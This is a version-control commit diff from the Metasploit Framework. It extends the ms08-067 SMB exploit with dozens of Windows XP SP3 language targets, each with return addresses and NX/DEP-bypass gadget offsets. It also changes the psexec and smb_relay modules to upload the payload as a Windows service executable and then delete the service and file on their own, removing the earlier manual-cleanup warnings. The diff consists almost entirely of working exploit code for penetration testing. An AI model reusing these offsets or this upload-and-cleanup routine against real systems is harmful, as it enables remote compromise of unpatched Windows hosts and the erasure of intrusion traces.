The psexec and smb_relay module now automatically cleanup. The ms08-06 module now supports all languages of XP SP3.

git-svn-id: file:///home/svn/framework3/trunk@5841 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2008-11-04 22:27:59 +00:00
parent d573c31be9
commit 0881649f14
4 changed files with 279 additions and 102 deletions

View File

@ -387,12 +387,12 @@ module Exploit::Remote::SMB
[
Rex::Text.to_unicode('Remotedrucker')
],
'Portugese - Brazilian' =>
'Portuguese - Brazilian' =>
[
Rex::Text.to_unicode('Impr. remotas Windows NT'),
Rex::Text.to_unicode('Impressoras remotas do Windows NT')
],
'Portguese' =>
'Portuguese' =>
[
Rex::Text.to_unicode('Imp. remotas do Windows NT')
],

View File

@ -67,6 +67,11 @@ class Metasploit3 < Msf::Exploit::Remote
#
[ 'Automatic Targeting', { 'auto' => true } ],
#
# UNIVERSAL TARGETS
#
#
# Antoine's universal for Windows 2000
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
@ -82,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Standard return-to-ESI without NX bypass
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
#
[ 'Windows XP SP0/SP1 Universal (NO NX)',
[ 'Windows XP SP0/SP1 Universal',
{
'Ret' => 0x01001361,
'Scratch' => 0x00020408,
@ -90,8 +95,10 @@ class Metasploit3 < Msf::Exploit::Remote
], # JMP ESI SVCHOST.EXE
#
# Metasploit's NX bypass for XP SP2/SP3
# ENGLISH TARGETS
#
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 English (NX)',
{
'Ret' => 0x6f88f727,
@ -100,9 +107,70 @@ class Metasploit3 < Msf::Exploit::Remote
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 English (NX)',
{
'Ret' => 0x6f88f807,
'DisableNX' => 0x6F8917C2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP0 English (NO NX)',
{
'Ret' => 0x71bf175f,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP1 English (NO NX)',
{
'Ret' => 0x71bf21a2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP1
[ 'Windows 2003 SP1 English (NX)',
{
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP2 English (NO NX)',
{
'Ret' => 0x71bf3969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
[ 'Windows 2003 SP2 English (NX)',
{
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
#
# NON-ENGLISH TARGETS
#
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 French (NX)',
{
'Ret' => 0x595bf727,
@ -127,7 +195,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Metasploit's NX bypass for XP SP2/SP3
# Target provided by Ramon de C. Valle <ramon@risesecurity.org>
#
[ 'Windows XP SP2 Portuguese (Brazil) (NX)',
[ 'Windows XP SP2 Portuguese - Brazilian (NX)',
{
'Ret' => 0x596ff727,
'DisableNX' => 0x597016e2,
@ -150,7 +218,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Metasploit's NX bypass for XP SP2/SP3
# Target provided by sunwear <shellcoder[at]hotmail.com>
#
[ 'Windows XP SP2 Chinese - Traditional (NX)',
[ 'Windows XP SP2 Chinese - Simplified (NX)',
{
'Ret' => 0x58fcda43,
'DisableNX' => 0x58fc16e2,
@ -168,18 +236,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Metasploit's NX bypass for XP SP2/SP3
#
[ 'Windows XP SP3 English (NX)',
{
'Ret' => 0x6f88f807,
'DisableNX' => 0x6F8917C2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Metasploit's NX bypass for XP SP2/SP3
# Target provided by Ulises2k <ulises2k[at]gmail.com>
@ -203,11 +259,56 @@ class Metasploit3 < Msf::Exploit::Remote
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Russian (NX)',
{
'Ret' => 0x6fe1f807,
'DisableNX' => 0x6fe217c2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
# Same as Russian
[ 'Windows XP SP3 Czech (NX)',
{
'Ret' => 0x6fe1f807,
'DisableNX' => 0x6fe217c2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Turkish (NX)',
{
'Ret' => 0x5a78f807,
'DisableNX' => 0x5a7917c2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Swedish (NX)',
{
'Ret' => 0x597af807,
'DisableNX' => 0x597b17c2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Portuguese (NX)',
{
'Ret' => 0x596bf807,
'DisableNX' => 0x596c17c2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
# Target provided by Ramon de C. Valle <ramon@risesecurity.org>
#
[ 'Windows XP SP3 Portugese - Brazilian (NX)',
[ 'Windows XP SP3 Portuguese - Brazilian (NX)',
{
'Ret' => 0x596ff807,
'DisableNX' => 0x597017c2,
@ -215,61 +316,133 @@ class Metasploit3 < Msf::Exploit::Remote
}
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL
#
# Standard return-to-ESI without NX bypass
#
[ 'Windows 2003 SP0 English (NO NX)',
# Metasploit's NX bypass for XP SP2/SP3
# Same as Portuguese
[ 'Windows XP SP3 Italian (NX)',
{
'Ret' => 0x71bf175f,
'Ret' => 0x596bf807,
'DisableNX' => 0x596c17c2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Standard return-to-ESI without NX bypass
#
[ 'Windows 2003 SP1 English (NO NX)',
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Polish (NX)',
{
'Ret' => 0x71bf21a2,
'Ret' => 0x5941f807,
'DisableNX' => 0x594217c2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Standard return-to-ESI without NX bypass
#
[ 'Windows 2003 SP2 English (NO NX)',
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Norwegian (NX)',
{
'Ret' => 0x71bf3969,
'Ret' => 0x597cf807,
'DisableNX' => 0x597d17c2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Brett Moore's crafty NX bypass for 2003 SP1
#
[ 'Windows 2003 SP1 English (NX)',
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Korean (NX)',
{
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
'Ret' => 0x6fd6f807,
'DisableNX' => 0x6fd717c2,
'Scratch' => 0x00020408,
}
],
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Brett Moore's crafty NX bypass for 2003 SP2
#
[ 'Windows 2003 SP2 English (NX)',
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Japanese (NX)',
{
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Ret' => 0x567fd4d2,
'DisableNX' => 0x568017c2,
'Scratch' => 0x00020408,
}
]
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Hungarian (NX)',
{
'Ret' => 0x5970f807,
'DisableNX' => 0x597117c2,
'Scratch' => 0x00020408,
}
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Hebrew (NX)',
{
'Ret' => 0x5940f807,
'DisableNX' => 0x594117c2,
'Scratch' => 0x00020408,
}
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Finnish (NX)',
{
'Ret' => 0x597df807,
'DisableNX' => 0x597e17c2,
'Scratch' => 0x00020408,
}
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Greek (NX)',
{
'Ret' => 0x592af807,
'DisableNX' => 0x592b17c2,
'Scratch' => 0x00020408,
}
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Danish (NX)',
{
'Ret' => 0x5978f807,
'DisableNX' => 0x597917c2,
'Scratch' => 0x00020408,
}
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Chinese - Simplified (NX)',
{
'Ret' => 0x58fbf807,
'DisableNX' => 0x58fc17c2,
'Scratch' => 0x00020408,
}
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Chinese - Traditional (NX)',
{
'Ret' => 0x5860f807,
'DisableNX' => 0x586117c2,
'Scratch' => 0x00020408,
}
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
# Same as Chinese Traditional
[ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
{
'Ret' => 0x5860f807,
'DisableNX' => 0x586117c2,
'Scratch' => 0x00020408,
}
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Arabic (NX)',
{
'Ret' => 0x6fd8f807,
'DisableNX' => 0x6fd917c2,
'Scratch' => 0x00020408,
}
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Missing Targets

View File

@ -191,7 +191,6 @@ class Metasploit3 < Msf::Exploit::Remote
rescue ::Exception => e
end
##
# OpenServiceW
##
@ -211,12 +210,6 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
# print_line(" ")
# print_status("You *MUST* manually remove the service: (#{servicename} - \"#{displayname}\")")
# print_status("You *MUST* manually delete the service file: %SYSTEMROOT%\\#{filename}")
# print_line(" ")
##
# StartService()
##
@ -234,12 +227,6 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
##
# Give the process time to initialize
##
print_status("Waiting on process to initialize...")
##
# DeleteService()
##
@ -254,7 +241,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Error: #{e}")
end
##
# CloseHandle()
##
@ -265,7 +251,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Error: #{e}")
end
print_status("Deleting \\#{filename}...")
simple.connect("ADMIN$")
simple.delete("\\#{filename}")

View File

@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Uploading payload...")
filename = rand_text_alpha(8) + ".exe"
fd = rclient.open("\\#{filename}", 'rwct')
fd << Rex::Text.to_win32pe(code.encoded)
fd << Rex::Text.to_win32pe_service(code.encoded,rand_text_alpha(8))
fd.close
print_status("Created \\#{filename}...")
@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote
##
servicename = rand_text_alpha(8)
displayname = 'M' + rand_text_alpha(rand(32)+1)
displayname = rand_text_alpha(rand(32)+1)
svc_handle = nil
svc_status = nil
@ -227,11 +227,6 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
print_line(" ")
print_status("You *MUST* manually remove the service: #{smb[:rhost]} (#{servicename} - \"#{displayname}\")")
print_status("You *MUST* manually delete the service file: #{smb[:rhost]} %SYSTEMROOT%\\#{filename}")
print_line(" ")
##
# StartService()
##
@ -249,7 +244,33 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Error: #{e}")
end
handler(smb[:rsock])
##
# DeleteService()
##
print_status("Removing the service...")
stubdata =
svc_handle
begin
response = dcerpc.call(0x02, stubdata)
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
end
rescue ::Exception => e
print_status("Error: #{e}")
end
##
# CloseHandle()
##
print_status("Closing service handle...")
begin
response = dcerpc.call(0x0, svc_handle)
rescue ::Exception => e
print_status("Error: #{e}")
end
print_status("Deleting \\#{filename}...")
simple.connect("ADMIN$")
simple.delete("\\#{filename}")
end
@ -324,7 +345,6 @@ class Metasploit3 < Msf::Exploit::Remote
target_host = smb[:ip]
end
rsock = nil
rport = nil
[445, 139].each do |rport|
@ -363,7 +383,6 @@ class Metasploit3 < Msf::Exploit::Remote
raise e
end
if (not rclient.client.challenge_key)
print_error("No challenge key received from #{smb[:ip]}:#{rport}")
rsock.close